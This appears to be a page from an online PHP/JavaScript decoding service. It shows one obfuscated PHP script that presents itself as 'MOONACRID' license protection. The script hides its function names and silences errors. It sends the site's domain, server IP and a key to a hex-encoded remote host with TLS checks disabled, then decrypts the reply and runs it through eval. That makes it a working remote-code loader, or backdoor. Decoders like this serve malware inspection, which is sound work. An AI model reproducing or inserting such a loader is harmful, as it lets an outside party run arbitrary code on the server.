Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


/*************************************************************
 * PROTECTED BY MOONACRID v5.0 - SERVER-SIDE PROTECTION
 *************************************************************/
@ini_set("display_errors",0);@error_reporting(0);

$_0x1a="_SERVER";
$_0x2b="HTTP_HOST";
$_0x3c="SERVER_ADDR";

$_0xck="3939656363336139366464393337616362343663323233633236303431386366";
$_0xdom="6d6f6f6e61637269642e636f6d";
$_0xsip="34362e342e3131332e313133";
$_0xurl="65626d4f754f61687148326c4f4f4152305a4b6d63587657547a684b46647752343145782b4a526b7a4b583861336b434444586b455369466141484c456e4b497863586d5479456d393158493630667479475979445735613558346756544534724f645353726a38593044514a507652514c635a39624879545679694e2f425932673d3d";

$_0xh2b="hex2bin";
$_0xhsh="hash";
$_0xsha="sha256";
$_0xb64="base64_decode";
$_0xsub="substr";
$_0xosd="openssl_decrypt";
$_0xgcm="aes-256-gcm";
$_0xfgc="file_get_contents";
$_0xhbq="http_build_query";
$_0xscc="stream_context_create";
$_0xjsd="json_decode";
$_0xevl="eval";
$_0xstl="strtolower";
$_0xprr="preg_replace";

$_0xk=$_0xhsh($_0xsha,$_0xh2b($_0xdom).$_0xh2b($_0xsip).$_0xh2b($_0xck),true);
$_0xd=$_0xb64($_0xh2b($_0xurl));
$_0xiv=$_0xsub($_0xd,0,12);
$_0xtg=$_0xsub($_0xd,12,16);
$_0xen=$_0xsub($_0xd,28);
$_0xsu=@$_0xosd($_0xen,$_0xgcm,$_0xk,OPENSSL_RAW_DATA,$_0xiv,$_0xtg);
if($_0xsu===false){die("License Error");}

$_0xcd=$_0xstl($_0xprr("/^www\./i","",${$_0x1a}[$_0x2b]??""));
$_0xsi=${$_0x1a}[$_0x3c]??"";

$_0xq=$_0xhbq(["action"=>"getprotection","domain"=>$_0xcd,"server_ip"=>$_0xsi,"client_key"=>$_0xh2b($_0xck)]);
$_0xctx=$_0xscc(["http"=>["method"=>"GET","timeout"=>15],"ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);
$_0xr=@$_0xfgc($_0xsu."?".$_0xq,false,$_0xctx);
if(!$_0xr){die("License Error");}

$_0xj=@$_0xjsd($_0xr,true);
if(!$_0xj||!$_0xj["success"]){die("License Error");}

$_0xpd=$_0xb64($_0xj["data"]);
$_0xpiv=$_0xsub($_0xpd,0,12);
$_0xptg=$_0xsub($_0xpd,12,16);
$_0xpen=$_0xsub($_0xpd,28);
$_0xpk=$_0xhsh($_0xsha,$_0xh2b($_0xck).$_0xj["pk"].$_0xh2b($_0xdom),true);
$_0xpc=@$_0xosd($_0xpen,$_0xgcm,$_0xpk,OPENSSL_RAW_DATA,$_0xpiv,$_0xptg);
if($_0xpc===false){die("License Error");}

$_0xevl($_0xpc);


© 2023 Quttera Ltd. All rights reserved.